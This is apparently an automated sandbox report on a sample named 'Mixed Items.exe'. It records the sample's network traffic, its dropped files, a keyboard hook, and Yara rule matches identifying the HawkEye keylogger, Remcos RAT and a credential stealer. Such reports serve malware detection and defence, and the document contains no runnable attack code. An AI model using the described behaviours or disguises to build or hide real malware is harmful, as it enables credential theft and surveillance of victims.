Source: global traffic | HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-EBDA9D3C78F7FA5DA1492447CFEEA8B3.html HTTP/1.1 | User-Agent: Other | Host: liverpoolofcfanclub.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-ACE03D270F49949C304CBC49EDC5CEFA.html HTTP/1.1 | User-Agent: Other | Host: liverpoolofcfanclub.com
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-ACE03D270F49949C304CBC49EDC5CEFA.html HTTP/1.1 | User-Agent: Other | Host: liverpoolofcfanclub.com
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-5120AB9D8EED6517DE7E81CD470A03B1.html HTTP/1.1 | User-Agent: Other | Host: liverpoolofcfanclub.com
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: whatismyipaddress.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-FC805D8F9D665A8AE96BD3B687F20834.html HTTP/1.1 | User-Agent: Other | Host: liverpoolofcfanclub.com
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-CADB725393BA475AD7E7466656748C83.html HTTP/1.1 | User-Agent: Other | Host: liverpoolofcfanclub.com
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
                        Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-5120AB9D8EED6517DE7E81CD470A03B1.html HTTP/1.1User-Agent: OtherHost: liverpoolofcfanclub.com
                        Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-FC805D8F9D665A8AE96BD3B687F20834.html HTTP/1.1User-Agent: OtherHost: liverpoolofcfanclub.com
                        Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-CADB725393BA475AD7E7466656748C83.html HTTP/1.1User-Agent: OtherHost: liverpoolofcfanclub.com
                        Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-1031025574F544F1BD64E20EEEC4AAC7.html HTTP/1.1User-Agent: OtherHost: liverpoolofcfanclub.com
                        Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-5C391B584FB3EF0C3E1226CABE1FDCB1.html HTTP/1.1User-Agent: OtherHost: liverpoolofcfanclub.com
                        Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-5C7589177DBC0A00C03B00FCEDE09850.html HTTP/1.1User-Agent: OtherHost: liverpoolofcfanclub.com
                        Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-1031025574F544F1BD64E20EEEC4AAC7.html HTTP/1.1User-Agent: OtherHost: liverpoolofcfanclub.com
                        Source: hawkgoods.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                        Source: unknownDNS traffic detected: queries for: liverpoolofcfanclub.com
                        Source: Mixed Items.exe, 00000000.00000003.207271954.0000000000B70000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                        Source: Mixed Items.exe, 00000000.00000003.207271954.0000000000B70000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                        Source: powershell.exe, 0000000A.00000002.509053847.0000000000924000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                        Source: Mixed Items.exe, 00000000.00000003.207271954.0000000000B70000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                        Source: svchost.exe, 00000006.00000002.524308365.000001FC10813000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                        Source: Mixed Items.exe, 00000000.00000003.207271954.0000000000B70000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                        Source: Mixed Items.exe, 00000000.00000003.207271954.0000000000B70000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                        Source: Mixed Items.exe, 00000000.00000003.207271954.0000000000B70000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                        Source: svchost.exe, 00000020.00000002.535147129.0000000000C9B000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                        Source: Mixed Items.exe, 00000000.00000003.209301179.0000000000BD3000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?814e6289d9d96
                        Source: Mixed Items.exeString found in binary or memory: http://liverpoolofcfanclub.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--
                        Source: Mixed Items.exeString found in binary or memory: http://liverpoolofcfanclub.com/liverpool-fc-news/features/steven-gerrardset_CurrentDirectory-liverpo
                        Source: powershell.exe, 0000000A.00000002.550176281.0000000005536000.00000004.00000001.sdmp, powershell.exe, 0000000B.00000002.549247252.0000000005C06000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.543804936.00000000054B6000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                        Source: svchost.exe, 00000006.00000002.524308365.000001FC10813000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                        Source: Mixed Items.exe, 00000000.00000003.207271954.0000000000B70000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                        Source: Mixed Items.exe, 00000000.00000003.207271954.0000000000B70000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                        Source: svchost.exe, 00000006.00000002.524308365.000001FC10813000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
                        Source: powershell.exe, 0000000B.00000002.528174444.0000000004CEB000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: powershell.exe, 0000000A.00000002.533087278.0000000004617000.00000004.00000001.sdmp, powershell.exe, 0000000B.00000002.528174444.0000000004CEB000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                        Source: svchost.exe, 00000006.00000002.527814462.000001FC10A00000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                        Source: powershell.exe, 0000000A.00000002.524606863.00000000044D1000.00000004.00000001.sdmp, powershell.exe, 0000000B.00000002.517492550.0000000004BA1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 0000000A.00000002.533087278.0000000004617000.00000004.00000001.sdmp, powershell.exe, 0000000B.00000002.528174444.0000000004CEB000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                        Source: hawkgoods.exeString found in binary or memory: http://whatismyipaddress.com/
                        Source: powershell.exe, 0000000B.00000002.528174444.0000000004CEB000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: Mixed Items.exe, 00000000.00000003.207271954.0000000000B70000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                        Source: AdvancedRun.exe, AdvancedRun.exe, 00000009.00000000.266715806.000000000040C000.00000002.00020000.sdmp, hawkgoods.exeString found in binary or memory: http://www.nirsoft.net/
                        Source: powershell.exe, 0000000D.00000002.543804936.00000000054B6000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 0000000D.00000002.543804936.00000000054B6000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 0000000D.00000002.543804936.00000000054B6000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
                        Source: powershell.exe, 0000000B.00000002.528174444.0000000004CEB000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: hawkgoods.exeString found in binary or memory: https://login.yahoo.com/config/login
                        Source: powershell.exe, 0000000A.00000002.550176281.0000000005536000.00000004.00000001.sdmp, powershell.exe, 0000000B.00000002.549247252.0000000005C06000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.543804936.00000000054B6000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: Mixed Items.exe, 00000000.00000003.209749994.0000000000BBF000.00000004.00000001.sdmpString found in binary or memory: https://wadl.windowsupdate.com/
                        Source: Mixed Items.exe, 00000000.00000003.207271954.0000000000B70000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                        Source: hawkgoods.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected HawkEye Keylogger
Source: Yara match | File source: 0000001E.00000002.392659949.00000000004C2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000002.347873362.0000000000403000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001E.00000000.309264681.00000000004C2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001E.00000002.445844944.0000000002FEC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, type: DROPPED
Source: Yara match | File source: 30.2.hawkgoods.exe.51fa72.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.Mixed Items.exe.4031bf.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 30.2.hawkgoods.exe.4c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 30.0.hawkgoods.exe.51fa72.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 30.0.hawkgoods.exe.4c8208.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 30.0.hawkgoods.exe.4c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 30.2.hawkgoods.exe.4c8208.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 30.0.hawkgoods.exe.4c9c0d.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 30.2.hawkgoods.exe.4c9c0d.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.Mixed Items.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.Mixed Items.exe.4095c7.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.Mixed Items.exe.40afcc.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.Mixed Items.exe.4031bf.3.raw.unpack, type: UNPACKEDPE
Installs a global keyboard hook
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\hawkgoods.exe
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Window created: window name: CLIPBRDWNDCLASS

E-Banking Fraud:

Yara detected Remcos RAT
Source: Yara match | File source: 00000025.00000002.488787782.0000000000982000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000002.347873362.0000000000403000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000025.00000002.490909756.0000000000A7A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Purchase Order.exe, type: DROPPED
Source: Yara match | File source: 25.2.Mixed Items.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.Mixed Items.exe.4095c7.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.Mixed Items.exe.40afcc.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.Mixed Items.exe.4031bf.3.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 0000001E.00000002.392659949.00000000004C2000.00000002.00020000.sdmp, type: MEMORY | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001E.00000002.392659949.00000000004C2000.00000002.00020000.sdmp, type: MEMORY | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000019.00000002.347873362.0000000000403000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000019.00000002.347873362.0000000000403000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 0000001E.00000000.309264681.00000000004C2000.00000002.00020000.sdmp, type: MEMORY | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001E.00000000.309264681.00000000004C2000.00000002.00020000.sdmp, type: MEMORY | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Local\Temp\Purchase Order.exe, type: DROPPED | Matched rule: REMCOS_RAT_variants Author: unknown
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, type: DROPPED | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, type: DROPPED | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 30.2.hawkgoods.exe.51fa72.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 30.2.hawkgoods.exe.51fa72.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 25.2.Mixed Items.exe.4031bf.3.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 25.2.Mixed Items.exe.4031bf.3.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 30.2.hawkgoods.exe.4c0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 30.2.hawkgoods.exe.4c0000.0.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 30.0.hawkgoods.exe.51fa72.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 30.0.hawkgoods.exe.51fa72.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 30.0.hawkgoods.exe.4c8208.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 30.0.hawkgoods.exe.4c8208.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 30.0.hawkgoods.exe.4c0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 30.0.hawkgoods.exe.4c0000.0.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 30.2.hawkgoods.exe.4c8208.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 30.2.hawkgoods.exe.4c8208.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 30.0.hawkgoods.exe.4c9c0d.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 30.0.hawkgoods.exe.4c9c0d.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 30.2.hawkgoods.exe.4c9c0d.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 30.2.hawkgoods.exe.4c9c0d.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 25.2.Mixed Items.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 25.2.Mixed Items.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 25.2.Mixed Items.exe.4095c7.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 25.2.Mixed Items.exe.4095c7.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 25.2.Mixed Items.exe.4095c7.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 25.2.Mixed Items.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 25.2.Mixed Items.exe.4031bf.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 25.2.Mixed Items.exe.40afcc.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 25.2.Mixed Items.exe.40afcc.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 25.2.Mixed Items.exe.4031bf.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 25.2.Mixed Items.exe.40afcc.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 25.2.Mixed Items.exe.4031bf.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\Desktop\Mixed Items.exe | File created: C:\Windows\Microsoft.NET\Framework\jZCvibqWhOYmSqmemHIRbwmqVF
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_0037BB38
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_0037DE68
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_0037F6D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_003B4180
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_003BE483
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_003BE483
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_003BE483
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_003BBBF6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_003BE483
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_003BE483
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_003BE483
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_003BE483
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_003B4180
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_003BBBF6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00E3E5E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00E2A0A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00E2F870
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00E2E008
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00E24CC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00E2BCD8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_00D3C279
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_00D3C30B
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 30_2_004CD426
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 30_2_004CD523
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 30_2_004DD5AE
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 30_2_004D7646
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 30_2_005029BE
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 30_2_00506AF4
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 30_2_0052ABFC
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 30_2_00523C4D
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 30_2_00523CBE
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 30_2_004CED03
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 30_2_00523D2F
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 30_2_00523DC0
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 30_2_004CCF92
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 30_2_004DAFA6
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 30_2_04D05758
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 30_2_04D06048
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 30_2_04D08710
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 30_2_04D07098
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 30_2_04D01D98
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 30_2_04D08A74
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 30_2_004FC7BC
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: String function: 0050BA9D appears 35 times
Source: C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe | Code function: String function: 0040B550 appears 50 times
Source: Mixed Items.exe | Static PE information: invalid certificate
Source: AdvancedRun.exe.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: AdvancedRun.exe.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Mixed Items.exe, 00000000.00000000.205841932.00000000003E2000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameMotherFuckerBitch.exe6 vs Mixed Items.exe
Source: Mixed Items.exe | Binary or memory string: OriginalFilename vs Mixed Items.exe
Source: Mixed Items.exe | Binary or memory string: OriginalFilename vs Mixed Items.exe
Source: Mixed Items.exe, 00000018.00000000.295563361.0000000000042000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameMotherFuckerBitch.exe6 vs Mixed Items.exe
Source: Mixed Items.exe | Binary or memory string: OriginalFilename vs Mixed Items.exe
Source: C:\Windows\System32\svchost.exe | Section loaded: xboxlivetitleid.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cdpsgshims.dll
Source: 0000001E.00000002.392659949.00000000004C2000.00000002.00020000.sdmp, type: MEMORY | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 0000001E.00000002.392659949.00000000004C2000.00000002.00020000.sdmp, type: MEMORY | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000019.00000002.347873362.0000000000403000.00000040.00000001.sdmp, type: MEMORY | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000019.00000002.347873362.0000000000403000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 0000001E.00000002.473493158.0000000007AA0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000001E.00000000.309264681.00000000004C2000.00000002.00020000.sdmp, type: MEMORY | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 0000001E.00000000.309264681.00000000004C2000.00000002.00020000.sdmp, type: MEMORY | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\AppData\Local\Temp\Purchase Order.exe, type: DROPPED | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, type: DROPPED | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, type: DROPPED | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, type: DROPPED | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 30.2.hawkgoods.exe.2be8a9c.4.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 30.2.hawkgoods.exe.300a1c4.5.raw.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 30.2.hawkgoods.exe.51fa72.2.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 30.2.hawkgoods.exe.51fa72.2.raw.unpack, type: UNPACKEDPE | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
